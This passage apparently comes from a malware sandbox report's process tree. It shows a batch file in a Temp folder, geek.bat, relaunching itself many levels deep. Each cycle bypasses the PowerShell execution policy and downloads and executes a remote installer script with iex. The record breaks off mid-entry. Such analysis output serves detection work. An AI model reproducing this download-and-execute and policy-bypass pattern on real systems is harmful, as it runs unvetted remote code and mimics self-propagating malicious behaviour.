        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        54⤵
        
        PID:1196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        55⤵
        
        PID:3684
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        56⤵
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        56⤵
        
        PID:3612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        56⤵
        
        PID:4976
        
        C:\Windows\system32\chcp.com
        
        chcp
        57⤵
        
        PID:1108
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        56⤵
        
        PID:1716
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        56⤵
        
        PID:5100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        56⤵
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        56⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        56⤵
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        57⤵
        
        PID:4608
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        58⤵
        
        PID:4520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        58⤵
        
        PID:2276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        58⤵
        
        PID:2904
        
        C:\Windows\system32\chcp.com
        
        chcp
        59⤵
        
        PID:4472
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        58⤵
        
        PID:2124
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        58⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        58⤵
        Blocklisted process makes network request
        
        PID:3164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        58⤵
        
        PID:1548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        59⤵
        
        PID:3500
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        60⤵
        
        PID:3184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        60⤵
        
        PID:3432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        60⤵
        
        PID:1828
        
        C:\Windows\system32\chcp.com
        
        chcp
        61⤵
        
        PID:1840
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        60⤵
        
        PID:2948
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        60⤵
        
        PID:1704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        60⤵
        
        PID:3096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        60⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        60⤵
        
        PID:4600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        61⤵
        
        PID:3464
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        62⤵
        
        PID:2288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        62⤵
        
        PID:4792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        62⤵
        
        PID:1108
        
        C:\Windows\system32\chcp.com
        
        chcp
        63⤵
        
        PID:4428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        62⤵
        
        PID:4972
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        62⤵
        
        PID:1044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        62⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        62⤵
        
        PID:3916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        63⤵
        
        PID:2216
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        64⤵
        
        PID:3016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        64⤵
        
        PID:628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        64⤵
        
        PID:3984
        
        C:\Windows\system32\chcp.com
        
        chcp
        65⤵
        
        PID:1600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        64⤵
        
        PID:4536
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        64⤵
        
        PID:1644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        64⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        64⤵
        Blocklisted process makes network request
        
        PID:4892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        64⤵
        
        PID:1272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        65⤵
        
        PID:1548
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        66⤵
        
        PID:4956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        66⤵
        
        PID:4624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        66⤵
        
        PID:4608
        
        C:\Windows\system32\chcp.com
        
        chcp
        67⤵
        
        PID:3184
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        66⤵
        
        PID:3432
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        66⤵
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        66⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        66⤵
        
        PID:2324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        67⤵
        
        PID:3532
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        68⤵
        
        PID:1276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        68⤵
        
        PID:4028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        68⤵
        
        PID:3288
        
        C:\Windows\system32\chcp.com
        
        chcp
        69⤵
        
        PID:3688
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        68⤵
        
        PID:4796
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        68⤵
        
        PID:4976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        68⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        68⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        68⤵
        
        PID:4380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        69⤵
        
        PID:644
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        70⤵
        
        PID:3684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        70⤵
        
        PID:1424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        70⤵
        
        PID:940
        
        C:\Windows\system32\chcp.com
        
        chcp
        71⤵
        
        PID:4444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        70⤵
        
        PID:2276
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        70⤵
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        70⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        70⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        70⤵
        
        PID:1280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        71⤵
        
        PID:1072
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        72⤵
        
        PID:528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        72⤵
        
        PID:1188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        72⤵
        
        PID:2136
        
        C:\Windows\system32\chcp.com
        
        chcp
        73⤵
        
        PID:5016
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        72⤵
        
        PID:2816
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        72⤵
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        72⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        72⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        72⤵
        
        PID:224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        73⤵
        
        PID:3508
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        74⤵
        
        PID:4804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        74⤵
        
        PID:2700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        74⤵
        
        PID:2688
        
        C:\Windows\system32\chcp.com
        
        chcp
        75⤵
        
        PID:2360
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        74⤵
        
        PID:4920
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        74⤵
        
        PID:3156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        74⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        74⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        74⤵
        
        PID:4264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        75⤵
        
        PID:3120
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        76⤵
        
        PID:4380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        76⤵
        
        PID:672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        76⤵
        
        PID:2088
        
        C:\Windows\system32\chcp.com
        
        chcp
        77⤵
        
        PID:2196
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        76⤵
        
        PID:3360
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        76⤵
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        76⤵
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        76⤵
        Blocklisted process makes network request
        
        PID:2676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        76⤵
        
        PID:1580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        77⤵
        
        PID:4004
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        78⤵
        
        PID:220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        78⤵
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        78⤵
        
        PID:4400
        
        C:\Windows\system32\chcp.com
        
        chcp
        79⤵
        
        PID:528
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        78⤵
        
        PID:1188
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        78⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        78⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        78⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        78⤵
        
        PID:2320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        79⤵
        
        PID:852
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        80⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        80⤵
        
        PID:5048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        80⤵
        
        PID:2728
        
        C:\Windows\system32\chcp.com
        
        chcp
        81⤵
        
        PID:2084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        80⤵
        
        PID:2988
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        80⤵
        
        PID:3888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        80⤵
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        80⤵
        Blocklisted process makes network request
        
        PID:4796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        80⤵
        
        PID:888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        81⤵
        
        PID:4160
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        82⤵
        
        PID:728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        82⤵
        
        PID:4768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        82⤵
        
        PID:3508
        
        C:\Windows\system32\chcp.com
        
        chcp
        83⤵
        
        PID:3340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        82⤵
        
        PID:4940
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        82⤵
        
        PID:1192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        82⤵
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        82⤵
        Blocklisted process makes network request
        
        PID:2276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        82⤵
        
        PID:4504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        83⤵
        
        PID:3164
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        84⤵
        
        PID:1364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        84⤵
        
        PID:1528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        84⤵
        
        PID:3872
        
        C:\Windows\system32\chcp.com
        
        chcp
        85⤵
        
        PID:4128
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        84⤵
        
        PID:1720
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        84⤵
        
        PID:644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        84⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        84⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:3600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        84⤵
        
        PID:4964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        85⤵
        
        PID:1312
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        86⤵
        
        PID:3384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        86⤵
        
        PID:3256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        86⤵
        
        PID:3140
        
        C:\Windows\system32\chcp.com
        
        chcp
        87⤵
        
        PID:2320
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        86⤵
        
        PID:3944
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        86⤵
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        86⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        86⤵
        Blocklisted process makes network request
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        86⤵
        
        PID:640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        87⤵
        
        PID:3928
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        88⤵
        
        PID:3644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        88⤵
        
        PID:1408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        88⤵
        
        PID:3552
        
        C:\Windows\system32\chcp.com
        
        chcp
        89⤵
        
        PID:1148
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        88⤵
        
        PID:224
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        88⤵
        
        PID:3500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        88⤵
        
        PID:396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        88⤵
        Blocklisted process makes network request
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        88⤵
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        89⤵
        
        PID:1444
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        90⤵
        
        PID:2680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        90⤵
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        90⤵
        
        PID:540
        
        C:\Windows\system32\chcp.com
        
        chcp
        91⤵
        
        PID:3520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        90⤵
        
        PID:4504
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        90⤵
        
        PID:3996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        90⤵
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        90⤵
        Blocklisted process makes network request
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        90⤵
        
        PID:392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        91⤵
        
        PID:4872
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        92⤵
        
        PID:3716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        92⤵
        
        PID:4184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        92⤵
        
        PID:4784
        
        C:\Windows\system32\chcp.com
        
        chcp
        93⤵
        
        PID:1916
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        92⤵
        
        PID:4916
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        92⤵
        
        PID:2844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        92⤵
        
        PID:408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        92⤵
        Blocklisted process makes network request
        
        PID:4644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        92⤵
        
        PID:4792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        93⤵
        
        PID:1044
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        94⤵
        
        PID:4168
        
        C:\Windows\system32\cmd.exe
        
